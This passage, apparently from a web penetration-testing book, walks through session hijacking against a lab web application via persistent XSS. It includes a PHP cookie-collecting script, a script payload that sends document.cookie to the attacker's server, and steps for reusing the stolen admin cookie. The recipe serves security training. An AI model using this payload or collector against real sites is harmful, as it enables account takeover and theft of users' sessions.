We have already talked about Cross Site Scripting (XSS), it is one of the most common web attacks nowadays. XSS can be used to trick the users to provide credentials by simulating login pages, to gather information by executing client-side commands, or to hijack sessions by obtaining session cookies and impersonating their legitimate owners in the attacker's browsers.
In this recipe, we will take advantage of a persistent XSS vulnerability to obtain the session cookie of a user and then use that cookie to hijack the session by implanting it in another browser, and then executing actions impersonating the user.
For this recipe, we will set up a web server that will act as our cookie gatherer; so, before we attack, we need to start the Apache server in our Kali machine and run the following in a terminal as root:
service apache2 start
In the system used for this book, Apache's document root is located at /var/www/html
, create a file called savecookie.php
in that directory and put the following code in it:
<?php $fp = fopen('/tmp/cookie_data.txt', 'a'); fwrite($fp, $_GET["cookie"] . " "); fclose($fp); ?>
This PHP script is the one that will gather all the cookies sent by the XSS attack. To make sure that it works go to http://127.0.0.1/savecookie.php?cookie=test
, and then check the contents of /tmp/cookie_data.txt
:
cat /tmp/cookie_data.txt
If it shows the word test
, everything is fine. The next step is to know what is the address of our Kali machine in the VirtualBox's Host Only network. In a terminal, run:
ifconfig
For this book, the vboxnet0 interface of the Kali machine has the 192.168.56.1 IP address.
http://192.168.56.102/peruggia/
.<script> var xmlHttp = new XMLHttpRequest(); xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true ); xmlHttp.send( null ); </script>
cat /tmp/cookie_data.txt
A new entry should appear in the file.
http://192.168.56.102/peruggia/
.admin
, both as username and password and click on Login.cat /tmp/cookie_data.txt
The last entry was generated by the user in the victim's browser.
/tmp/cookie_data.txt
and paste it in the Content field, as shown:Now we have the admin's session hijacked via a persistent XSS attack.
In short, we used an XSS vulnerability in the application to send the session cookie to a remote server through a JavaScript HTTP request; this server was configured to store the session cookies. Then, we took one session ID and implanted it in a different browser to hijack an authenticated user's session. Next, we will see how each step works.
The PHP file we made in the Getting ready section is the one that saves the received cookies when the XSS attack is executed.
The comment we introduced is a script that uses the XMLHttpRequest object from JavaScript to make an HTTP request to our malicious server; that request is made in two steps:
xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true );
We open a request using the "GET" method, adding a parameter called cookie
to the http://192.168.56.1/savecookie.php
URL whose value is the one stored in document.cookie
, which is the variable that stores the cookies value in JavaScript. Finally, the last parameter that is set to true
tells the browser that it will be an asynchronous request, which means that it does not have to wait for a response.
xmlHttp.send( null );
This last instruction sends the request to the server.
After the administrator logs in and views a page that includes the comment we posted, the script is executed and the administrator's session cookie is stored in our server.
Finally, once we get the session ID of a valid user, we just replace our own session cookie with it in the browser and reload the page to perform an operation, as if we were such user.
Instead of only saving the session cookies to a file, the malicious server can also use those cookies to send requests to the application impersonating legitimate users, in order to perform operations such as adding or deleting comments, uploading pictures, or creating new users, even administrators.
3.16.51.157